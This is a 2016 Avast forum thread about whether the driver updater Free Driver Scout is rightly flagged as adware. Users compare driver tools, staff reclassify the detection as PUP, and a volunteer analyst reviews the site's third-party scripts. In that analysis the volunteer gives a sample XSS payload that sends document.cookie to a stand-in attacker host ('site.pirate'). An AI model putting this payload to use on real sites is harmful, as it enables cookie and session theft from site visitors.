Author Topic: Free Driver Scout false positive?  (Read 8141 times)

0 Members and 1 Guest are viewing this topic.

Offline RejZoR

  • Polymorphic Sheep
  • Serious Graphoman
  • *****
  • Posts: 9406
  • We are supersheep, resistance is futile!
    • RejZoR's Flock of Sheep
Free Driver Scout false positive?
« on: May 25, 2016, 08:24:06 PM »
http://freedriverscout.com

Getting detected as Win32:Adware-gen [Adw]. Even without PUP enabled. Is this correct?
Visit my webpage Angry Sheep Blog

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
« Last Edit: May 25, 2016, 11:44:03 PM by Pondus »

Offline RejZoR

  • Polymorphic Sheep
  • Serious Graphoman
  • *****
  • Posts: 9406
  • We are supersheep, resistance is futile!
    • RejZoR's Flock of Sheep
Re: Free Driver Scout false positive?
« Reply #2 on: May 25, 2016, 09:39:32 PM »
It was highly praised by PC Support webpage: http://pcsupport.about.com/od/driversites/tp/free-driver-updater-tools.htm

I tried Driver Booster and I quite like it. Now I've wanted to try this one and it was stopped by avast!...
Visit my webpage Angry Sheep Blog

Offline Eddy

  • Avast Evangelist
  • Maybe Bot
  • ***
  • Posts: 31080
  • Watching (over?) you
    • Malware removal, Biljart and other things.
Re: Free Driver Scout false positive?
« Reply #3 on: May 25, 2016, 10:21:31 PM »
The real question is if you need such a tool.

Is there a need to have the latest drivers installed ?
Normally not, but there are exceptions ofcourse.
e.g.
If the new ones fix a a security flaw. (for instance if you use a printer through wifi)
If the new ones fix a bug that is making your hardware not work properly.

And why using a 3rd party tool for it?
They don't have a database for the millions of different hardware that exist.
Manufacturers websites have the newest drivers before those tools have them listed.

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88900
  • No support PMs thanks
Re: Free Driver Scout false positive?
« Reply #4 on: May 26, 2016, 12:16:57 AM »
It matters not if you need such a thing, only that you want to use/try it and it is being blocked.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline savcin

  • Avast team
  • Full Member
  • *
  • Posts: 113
Re: Free Driver Scout false positive?
« Reply #5 on: May 26, 2016, 03:55:21 PM »
Detection has been changed to PUP.

Offline RejZoR

  • Polymorphic Sheep
  • Serious Graphoman
  • *****
  • Posts: 9406
  • We are supersheep, resistance is futile!
    • RejZoR's Flock of Sheep
Re: Free Driver Scout false positive?
« Reply #6 on: May 26, 2016, 05:03:29 PM »
The real question is if you need such a tool.

Is there a need to have the latest drivers installed ?
Normally not, but there are exceptions ofcourse.
e.g.
If the new ones fix a a security flaw. (for instance if you use a printer through wifi)
If the new ones fix a bug that is making your hardware not work properly.

And why using a 3rd party tool for it?
They don't have a database for the millions of different hardware that exist.
Manufacturers websites have the newest drivers before those tools have them listed.

It is when you have to reinstall a device like a Windows tablet and you don't have a slightest clue what all those weird PCI controllers are and there is no centralized driver download like for regular motherboards. But with tools like this, everything gets detected and installed properly. Without these tools I'd never get it working properly.

EDIT:
It's still being detected exactly the same as before. Where was it moved to PUP detection? Looks the same for me...
Visit my webpage Angry Sheep Blog

Offline Lord_Ami

  • Sr. Member
  • ****
  • Posts: 227
Re: Free Driver Scout false positive?
« Reply #7 on: May 26, 2016, 10:21:16 PM »
The real question is if you need such a tool.

Is there a need to have the latest drivers installed ?
Normally not, but there are exceptions ofcourse.
e.g.
If the new ones fix a a security flaw. (for instance if you use a printer through wifi)
If the new ones fix a bug that is making your hardware not work properly.

And why using a 3rd party tool for it?
They don't have a database for the millions of different hardware that exist.
Manufacturers websites have the newest drivers before those tools have them listed.

It is when you have to reinstall a device like a Windows tablet and you don't have a slightest clue what all those weird PCI controllers are and there is no centralized driver download like for regular motherboards. But with tools like this, everything gets detected and installed properly. Without these tools I'd never get it working properly.

EDIT:
It's still being detected exactly the same as before. Where was it moved to PUP detection? Looks the same for me...
For issues like this I'd suggest
https://sdi-tool.org/
Yes, it's big, but it does its job very well (used it myself many times).

Offline Lotan

  • Sr. Member
  • ****
  • Posts: 289
Re: Free Driver Scout false positive?
« Reply #8 on: May 26, 2016, 11:48:08 PM »
i just stick with iobits driver booster. It gets the job done.

Offline RejZoR

  • Polymorphic Sheep
  • Serious Graphoman
  • *****
  • Posts: 9406
  • We are supersheep, resistance is futile!
    • RejZoR's Flock of Sheep
Re: Free Driver Scout false positive?
« Reply #9 on: May 27, 2016, 11:03:36 AM »
So, what is with this file? Is it a false positive or a genuine detection?
Visit my webpage Angry Sheep Blog

Offline Be Secure

  • Long Time Avast User(10years.....) Security Enthusiast.
  • Avast Evangelist
  • Super Poster
  • ***
  • Posts: 1908
Re: Free Driver Scout false positive?
« Reply #10 on: May 27, 2016, 11:12:08 AM »
So, what is with this file? Is it a false positive or a genuine detection?
It is a PUP.A genuine detection for sure.
PC- Windows10 EDU 64Bit,avast! free 21.1.2449,uBlock Origin,NVT_OSA,GoogleChrome(64bit),CCleaner,Unchecky,ZAM Free,Shadow Defender.
Security Enthusiast

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Free Driver Scout false positive?
« Reply #11 on: May 27, 2016, 12:47:50 PM »
Hi RejZoR,

When you see what is running at that site: http://retire.insecurity.today/#!/scan/60fc1c974bfdf490c2c49eb8c19231fceeae8d410bc8adf5544c38ac780280e3
and you know what to block and are intented to willingly download the potential unwanted software,
because you are fully aware of any risks involved, then there is no risk downloading the tool.
Nothing to hold you back.

Script blockers block some of the third party code running on that website like: -http://dmp.theadex.com/d/105/21/s/adex.js
and -http://beacon-4.newrelic.com/1/26cb0a7878?  and -http://js-agent.newrelic.com/nr-100.js
Well a developer of free tools have to make an income of sorts somewhere so tracking scripts galore on such a page,
resulting in that PUP alert.

Just see where this lands for instance: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fjs-agent.newrelic.com%2Fnr-100.js

The code error next to the XSS sources and sinks:
Code: [Select]
detected] script
     info: [decodingLevel=0] found JavaScript
     error: line:3: SyntaxError: missing ; before statement:
          error: line:3: ar NR_QUEUE=[];"undefined"!=typeof window.NREUMQ?NR_QUEUE=NREUMQ:"undefined"!=typeof window.EPISODES?NR_QUEUE=EPISODES.q:"undefined"!=typeof window.NREUM&&(NR_QUEUE=NREUM.q);var NREUM=NREUM||{};NREUM.q=NR_QUEUE,NREUM.targetOrigin=[i]document.location.protoco[/i]
          error: line:3: ^
New Relic Google Episodes code that comes shared on the webs. Exceptions should be mitigated by re-copiing for errors.

So whenever you use free tools to-day you pay with some of your privacy and meta-data, it always comes at a price that you should be willing to pay or you should block what should be blocked at such a page.

Non-persistent cross-site-scripting attacks are possible here, depending on where code has access,
and could be performed via an attack like for instance
 
Code: [Select]
<SCRIPT>
document.location='http://site.pirate/cgi-bin/script.cgi?'+document.cookie
</SCRIPT>
.
Just to give an example for document.location.protoco  -> document.location.href)+"&p="+NREUM.sHash(document.referrer)
and indeed there is room for insecurity for scripts running on the site, see: https://sritest.io/#report/0cddf512-ac4d-4005-b3da-5be611dfeb93

See: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fcdn.optimizely.com%2Fjs%2F507870057.js  SRI hash missing
and Results from scanning URL: http://cdn.optimizely.com/js/507870057.js
Number of sources found: 103
Number of sinks found: 42

Could be a good idea to profoundly security test all the code on that website,
but i.m.h.o. there are no immediate malware threats not from the site nor from that tool,
better security could be implemented though, just be aware of the complicated code chain error consequences.
All works through on the general website's security infrastructure.

Have a nice day,

polonus (volunteer website security analyst and website error-hunter)



Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!